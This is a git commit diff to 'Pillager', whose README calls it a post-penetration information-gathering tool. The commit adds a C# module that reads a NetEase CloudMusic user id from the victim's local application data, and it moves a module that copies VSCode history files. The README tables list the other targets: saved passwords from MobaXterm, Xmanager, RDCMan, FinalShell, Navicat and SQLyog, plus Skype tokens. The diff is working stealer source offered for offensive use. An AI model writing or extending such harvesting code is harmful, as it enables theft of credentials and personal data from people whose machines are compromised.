Add Netease CloudMusic
This commit is contained in:
parent
1811d9ae1e
commit
e9c60891e3
|
@ -82,12 +82,13 @@
|
|||
<Compile Include="Program.cs" />
|
||||
<Compile Include="Properties\AssemblyInfo.cs" />
|
||||
<Compile Include="Helper\SQLiteHandler.cs" />
|
||||
<Compile Include="Softwares\NeteaseCloudMusic.cs" />
|
||||
<Compile Include="Tools\FinalShell.cs" />
|
||||
<Compile Include="Tools\MobaXterm.cs" />
|
||||
<Compile Include="Tools\Navicat.cs" />
|
||||
<Compile Include="Tools\RDCMan.cs" />
|
||||
<Compile Include="Tools\SQLyog.cs" />
|
||||
<Compile Include="Tools\VSCode.cs" />
|
||||
<Compile Include="Softwares\VSCode.cs" />
|
||||
<Compile Include="Tools\Xmanager.cs" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
|
|
|
@ -0,0 +1,28 @@
|
|||
using Pillager.Helper;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Softwares
|
||||
{
|
||||
internal class NeteaseCloudMusic
|
||||
{
|
||||
public static string SoftwareName = "NeteaseCloudMusic";
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
try
|
||||
{
|
||||
string infopath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Netease\\CloudMusic\\info");
|
||||
string info = File.ReadAllText(infopath);
|
||||
if (string.IsNullOrEmpty(info)) return;
|
||||
string savepath = Path.Combine(path, SoftwareName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
File.WriteAllText(Path.Combine(savepath, "userinfo.url"), " [InternetShortcut]\r\nURL=https://music.163.com/#/user/home?id=" + info);
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
|
@ -5,11 +5,11 @@ using System.IO;
|
|||
using System.Linq;
|
||||
using System.Text;
|
||||
|
||||
namespace Pillager.Tools
|
||||
namespace Pillager.Softwares
|
||||
{
|
||||
internal class VSCode
|
||||
{
|
||||
public static string ToolName = "VSCode";
|
||||
public static string SoftwareName = "VSCode";
|
||||
|
||||
public static void Save(string path)
|
||||
{
|
||||
|
@ -17,7 +17,7 @@ namespace Pillager.Tools
|
|||
{
|
||||
string historypath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Code\\User\\History");
|
||||
if (!Directory.Exists(historypath)) return;
|
||||
string savepath = Path.Combine(path, ToolName);
|
||||
string savepath = Path.Combine(path, SoftwareName);
|
||||
Directory.CreateDirectory(savepath);
|
||||
Methods.CopyDirectory(historypath, Path.Combine(savepath, "History"), true);
|
||||
}
|
22
README.md
22
README.md
|
@ -49,15 +49,19 @@ Pillager是一个适用于后渗透期间的信息收集工具,可以收集目
|
|||
| Skype | Token |
|
||||
| Enigma | DeviceID/Datebase |
|
||||
|
||||
| Tool | Support |
|
||||
| :--------: | :-----------: |
|
||||
| MobaXterm | Password |
|
||||
| Xmanager | Password |
|
||||
| RDCMan | Password |
|
||||
| FinalShell | Password |
|
||||
| Navicat | Password |
|
||||
| VSCode | History Files |
|
||||
| SQLyog | Password |
|
||||
| Tool | Support |
|
||||
| :--------: | :------: |
|
||||
| MobaXterm | Password |
|
||||
| Xmanager | Password |
|
||||
| RDCMan | Password |
|
||||
| FinalShell | Password |
|
||||
| Navicat | Password |
|
||||
| SQLyog | Password |
|
||||
|
||||
| Software | Support |
|
||||
| :----------------: | :-----------: |
|
||||
| VSCode | History Files |
|
||||
| Netease CloudMusic | UserInfo |
|
||||
|
||||
| Mail | Support |
|
||||
| :--------: | :------: |
|
||||
|
|
Loading…
Reference in New Issue